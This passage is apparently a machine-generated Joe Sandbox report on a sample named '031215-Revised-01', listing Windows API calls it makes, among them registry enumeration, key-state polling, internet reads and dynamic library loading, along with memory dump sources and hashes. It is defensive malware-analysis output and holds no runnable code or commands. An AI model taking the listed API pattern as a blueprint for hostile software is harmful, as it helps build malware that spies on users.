                                        • Instruction Fuzzy Hash: F5E0CD36E015229BD27117256C18B6F75D4EF81F72B054215FC44D2140DBF8CD418CF8
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,000B3CDE,?,00141418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00074E62
                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00074E74
                                        • FreeLibrary.KERNEL32(00000000,?,?,000B3CDE,?,00141418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00074E87
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                        • API String ID: 145871493-1355242751
                                        • Opcode ID: c4c3dfad4479686b121ec8492bfd0c29334095dae0ff3912482db2aab1371eff
                                        • Instruction ID: ccd3e62b4a556c9b55b722ba189ab3fe3ea0999002efdf62e44d7ea1b155b87e
                                        • Opcode Fuzzy Hash: c4c3dfad4479686b121ec8492bfd0c29334095dae0ff3912482db2aab1371eff
                                        • Instruction Fuzzy Hash: 1CD0C23290262197C6221B246C08DCB2A5CEF86B613054310B848E2150CFB8CD418AD8
                                        APIs
                                        • GetCurrentProcessId.KERNEL32 ref: 000FA427
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 000FA435
                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 000FA468
                                        • CloseHandle.KERNEL32(?), ref: 000FA63D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                        • String ID:
                                        • API String ID: 3488606520-0
                                        • Opcode ID: b7ed8aae37ab099c6085535a57aa628845a9f0e5853de6ece44b4431db82648f
                                        • Instruction ID: 28fc6feebf2cf229f6a0039298b7b80e07307168106a7d9a9c7d88878d542468
                                        • Opcode Fuzzy Hash: b7ed8aae37ab099c6085535a57aa628845a9f0e5853de6ece44b4431db82648f
                                        • Instruction Fuzzy Hash: 15A1A0B16047019FD720DF24C882F6AB7E5AF84714F14881DF59E9B692DBB4EC418B92
                                        APIs
                                          • Part of subcall function 000DDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000DCF22,?), ref: 000DDDFD
                                          • Part of subcall function 000DDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,000DCF22,?), ref: 000DDE16
                                          • Part of subcall function 000DE199: GetFileAttributesW.KERNEL32(?,000DCF95), ref: 000DE19A
                                        • lstrcmpiW.KERNEL32(?,?), ref: 000DE473
                                        • MoveFileW.KERNEL32(?,?), ref: 000DE4AC
                                        • _wcslen.LIBCMT ref: 000DE5EB
                                        • _wcslen.LIBCMT ref: 000DE603
                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 000DE650
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                        • String ID:
                                        • API String ID: 3183298772-0
                                        • Opcode ID: 1eb4d2f0f6dd21780d5a96c272c98cd113c463b05b340656055fc7ae512157a3
                                        • Instruction ID: 14b0a33a6ba613884dc4c84736782b5660dc375a93549e882c183c6da1997038
                                        • Opcode Fuzzy Hash: 1eb4d2f0f6dd21780d5a96c272c98cd113c463b05b340656055fc7ae512157a3
                                        • Instruction Fuzzy Hash: 4B5161B24087855BC764EB94DC819DF73DCAF84340F00491FF689D7292EE74A5888B6A
                                        APIs
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                          • Part of subcall function 000FC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000FB6AE,?,?), ref: 000FC9B5
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FC9F1
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FCA68
                                          • Part of subcall function 000FC998: _wcslen.LIBCMT ref: 000FCA9E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000FBAA5
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000FBB00
                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 000FBB63
                                        • RegCloseKey.ADVAPI32(?,?), ref: 000FBBA6
                                        • RegCloseKey.ADVAPI32(00000000), ref: 000FBBB3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                        • String ID:
                                        • API String ID: 826366716-0
                                        • Opcode ID: a055e1a80047c87f5e08906d22e020d83b3da889403283ed23041cec5e30ee4a
                                        • Instruction ID: 0c14f3ad6608c29cf8569ec20a62c2551dcd0fece5028c888c9b02655beb645f
                                        • Opcode Fuzzy Hash: a055e1a80047c87f5e08906d22e020d83b3da889403283ed23041cec5e30ee4a
                                        • Instruction Fuzzy Hash: 52619A31208205AFD314DF24C891E6ABBE5FF84308F54899CF5998B6A2CB71ED45DF92
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 000D8BCD
                                        • VariantClear.OLEAUT32 ref: 000D8C3E
                                        • VariantClear.OLEAUT32 ref: 000D8C9D
                                        • VariantClear.OLEAUT32(?), ref: 000D8D10
                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 000D8D3B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Variant$Clear$ChangeInitType
                                        • String ID:
                                        • API String ID: 4136290138-0
                                        • Opcode ID: 636d51005dcdcc7afad763a40e0b31d6eee2ac79be47965212397f4167ea0c4f
                                        • Instruction ID: 2ac94df20dcaf4272a640834c023d364071385f883e65ee621f330865ec4b302
                                        • Opcode Fuzzy Hash: 636d51005dcdcc7afad763a40e0b31d6eee2ac79be47965212397f4167ea0c4f
                                        • Instruction Fuzzy Hash: B35159B5A00219EFCB14CF68C894AAAB7F9FF89310F15855AE945DB350E730E911CFA0
                                        APIs
                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 000E8BAE
                                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 000E8BDA
                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 000E8C32
                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 000E8C57
                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 000E8C5F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$SectionWrite$String
                                        • String ID:
                                        • API String ID: 2832842796-0
                                        • Opcode ID: 39730ff4a9fa45130fe6be8c456da2e07846558e439c40f0f32cfd4188f48fb4
                                        • Instruction ID: fa7bc9e81a3ebe72a0198b61957cf954a881f25fa46466e166eec6671cdc4b98
                                        • Opcode Fuzzy Hash: 39730ff4a9fa45130fe6be8c456da2e07846558e439c40f0f32cfd4188f48fb4
                                        • Instruction Fuzzy Hash: C4514735A00619AFCB04DF65C881AA9BBF1FF49314F18C058E84DAB362CB75ED41CB90
                                        APIs
                                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 000F8F40
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 000F8FD0
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 000F8FEC
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 000F9032
                                        • FreeLibrary.KERNEL32(00000000), ref: 000F9052
                                          • Part of subcall function 0008F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,000E1043,?,753CE610), ref: 0008F6E6
                                          • Part of subcall function 0008F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000CFA64,00000000,00000000,?,?,000E1043,?,753CE610,?,000CFA64), ref: 0008F70D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                        • String ID:
                                        • API String ID: 666041331-0
                                        • Opcode ID: 4f21e4ae96651676e283d9c0397ed5c4c8e6576bfbfe68ee69881129417ad435
                                        • Instruction ID: f204d7daf7ac5b7c94331093a9357c8ce91216b996a3585541b261fa268f8f31
                                        • Opcode Fuzzy Hash: 4f21e4ae96651676e283d9c0397ed5c4c8e6576bfbfe68ee69881129417ad435
                                        • Instruction Fuzzy Hash: 98512634A00209DFC715DF68C4849EDBBF1FF49314B0881A8E94A9BB62DB35ED85CB91
                                        APIs
                                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00106C33
                                        • SetWindowLongW.USER32(?,000000EC,?), ref: 00106C4A
                                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00106C73
                                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,000EAB79,00000000,00000000), ref: 00106C98
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00106CC7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$Long$MessageSendShow
                                        • String ID:
                                        • API String ID: 3688381893-0
                                        • Opcode ID: e2f64ada596c446456a003b23c06c00551c0561f5434a534e773a0aedb944ba1
                                        • Instruction ID: 4f6c9ad797f758c4fd0cbffe84ee8c58cd3c6866c8fcfd2344a1a06653af6fe0
                                        • Opcode Fuzzy Hash: e2f64ada596c446456a003b23c06c00551c0561f5434a534e773a0aedb944ba1
                                        • Instruction Fuzzy Hash: 2F41B735604104AFE724CF28CE54FA97BA5EB0A350F150268F9D9A72E0C7B1AD61DA90
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 72dce0f596a8724928a3ed7ff139a5ddb78b51c892792c0f12e7f87bdd1ae626
                                        • Instruction ID: 9f9ab50b140449c34b6a21e15609898530abdb97b5caec2deca5f10b2fda2681
                                        • Opcode Fuzzy Hash: 72dce0f596a8724928a3ed7ff139a5ddb78b51c892792c0f12e7f87bdd1ae626
                                        • Instruction Fuzzy Hash: CA41B276A002009FCB24DFBCC981A9EB7E5EF8A714F154579E615EB352DB31AD01CB81
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 00089141
                                        • ScreenToClient.USER32(00000000,?), ref: 0008915E
                                        • GetAsyncKeyState.USER32(00000001), ref: 00089183
                                        • GetAsyncKeyState.USER32(00000002), ref: 0008919D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: AsyncState$ClientCursorScreen
                                        • String ID:
                                        • API String ID: 4210589936-0
                                        • Opcode ID: 8d403db89f550c8ae188a15ac17300eabb8872f019712956ad311a9276c6e380
                                        • Instruction ID: d08962166baa974f5117cda8d89952a5528cd635dad1c9e60a8e2800edbe2855
                                        • Opcode Fuzzy Hash: 8d403db89f550c8ae188a15ac17300eabb8872f019712956ad311a9276c6e380
                                        • Instruction Fuzzy Hash: 8D414031A0851AFBDF55AF68C848BFEB7B4FB05324F244219E869A72D0C7745950CF91
                                        APIs
                                        • GetInputState.USER32 ref: 000E38CB
                                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 000E3922
                                        • TranslateMessage.USER32(?), ref: 000E394B
                                        • DispatchMessageW.USER32(?), ref: 000E3955
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000E3966
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                        • String ID:
                                        • API String ID: 2256411358-0
                                        • Opcode ID: f12f593ca98116972ba0431bb1894febc8325fc01739a921163c2f4c0cb9f5e4
                                        • Instruction ID: 49cfe312e8279fdcdab6ea275d49c593d29778bb2c54c4fabcab8bfa783a76c6
                                        • Opcode Fuzzy Hash: f12f593ca98116972ba0431bb1894febc8325fc01739a921163c2f4c0cb9f5e4
                                        • Instruction Fuzzy Hash: 7D31B6745043C2AEEB75CB36D84DBB67FE8AB06304F040559E456A34A2D7F496C5CB21
                                        APIs
                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 000ECF38
                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 000ECF6F
                                        • GetLastError.KERNEL32(?,00000000,?,?,?,000EC21E,00000000), ref: 000ECFB4
                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,000EC21E,00000000), ref: 000ECFC8
                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,000EC21E,00000000), ref: 000ECFF2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                        • String ID:
                                        • API String ID: 3191363074-0
                                        • Opcode ID: b1d972b4be2aae00e4b5de66b16a0b2cc616862799a0ad8187a51abda6bf14ab
                                        • Instruction ID: 4fb20a89433691e32eef45b67b1f513e09c07bc588ffd4ca6afd97f8d2cf0b24
                                        • Opcode Fuzzy Hash: b1d972b4be2aae00e4b5de66b16a0b2cc616862799a0ad8187a51abda6bf14ab
                                        • Instruction Fuzzy Hash: 75316B71600245AFEB20DFA6C884EAFBBF9FB14311B10443EF546E2501DB31AE42DBA0
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 000D1915
                                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 000D19C1
                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 000D19C9
                                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 000D19DA
                                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 000D19E2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessagePostSleep$RectWindow
                                        • String ID:
                                        • API String ID: 3382505437-0
                                        • Opcode ID: 6b999aefbb66360a4fce509cc6a9277aeb0e5bb73711c4e6e1b1fccfb3ff3b1e
                                        • Instruction ID: 4dbe5b35088740a519f6d45962ce177743816ef5eb55f57f6a815579e5110471
                                        • Opcode Fuzzy Hash: 6b999aefbb66360a4fce509cc6a9277aeb0e5bb73711c4e6e1b1fccfb3ff3b1e
                                        • Instruction Fuzzy Hash: 7031B171900219EFCB10CFA8CDA9ADE7BB5EB04315F10432AF961A72D1C7B09D44CBA0
                                        APIs
                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00105745
                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 0010579D
                                        • _wcslen.LIBCMT ref: 001057AF
                                        • _wcslen.LIBCMT ref: 001057BA
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00105816
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$_wcslen
                                        • String ID:
                                        • API String ID: 763830540-0
                                        • Opcode ID: 2c6445a622eebce5c5835d6e813b70bbcc501f34d3d11b667b4c90ed5b2285ea
                                        • Instruction ID: 87f757a3115cd6867350a5b7311cb00af4cb88d35c063361f1ce7a0c5de07b23
                                        • Opcode Fuzzy Hash: 2c6445a622eebce5c5835d6e813b70bbcc501f34d3d11b667b4c90ed5b2285ea
                                        • Instruction Fuzzy Hash: C8218275904618AADF209FA0CC85AEE7BBDFF44724F108216E969EA1C1E7B099C5CF50
                                        APIs
                                        • IsWindow.USER32(00000000), ref: 000F0951
                                        • GetForegroundWindow.USER32 ref: 000F0968
                                        • GetDC.USER32(00000000), ref: 000F09A4
                                        • GetPixel.GDI32(00000000,?,00000003), ref: 000F09B0
                                        • ReleaseDC.USER32(00000000,00000003), ref: 000F09E8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$ForegroundPixelRelease
                                        • String ID:
                                        • API String ID: 4156661090-0
                                        • Opcode ID: 1cce22b257bf0bb69f2d033e33de1487d5d70d5fa1ffedad781a3d38dd16dada
                                        • Instruction ID: 26da8e841f7509fc0b61f657b485bb5bc32882712eeb8c458d78c6c68659e420
                                        • Opcode Fuzzy Hash: 1cce22b257bf0bb69f2d033e33de1487d5d70d5fa1ffedad781a3d38dd16dada
                                        • Instruction Fuzzy Hash: 42218135A00204AFD714EF65C885EAEBBE5EF48700F048168F94AA7762DB70AC44DF90
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 000ACDC6
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000ACDE9
                                          • Part of subcall function 000A3820: RtlAllocateHeap.NTDLL(00000000,?,00141444,?,0008FDF5,?,?,0007A976,00000010,00141440,000713FC,?,000713C6,?,00071129), ref: 000A3852
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 000ACE0F
                                        • _free.LIBCMT ref: 000ACE22
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000ACE31
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        • String ID:
                                        • API String ID: 336800556-0
                                        • Opcode ID: 4f1fb276d9d2b5675ab2dd45f8d1d898b908a221dbf416fc0625eb351275dd3d
                                        • Instruction ID: 266584f742c98cfa4d89739c77b6829dbeb22da1fa89dfb3a0ad731a06f63368
                                        • Opcode Fuzzy Hash: 4f1fb276d9d2b5675ab2dd45f8d1d898b908a221dbf416fc0625eb351275dd3d
                                        • Instruction Fuzzy Hash: 030184726012157F772157FA6C88DBF69ADEFC7BA13160229F905D7201EA718D0185F0
                                        APIs
                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00089693
                                        • SelectObject.GDI32(?,00000000), ref: 000896A2
                                        • BeginPath.GDI32(?), ref: 000896B9
                                        • SelectObject.GDI32(?,00000000), ref: 000896E2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
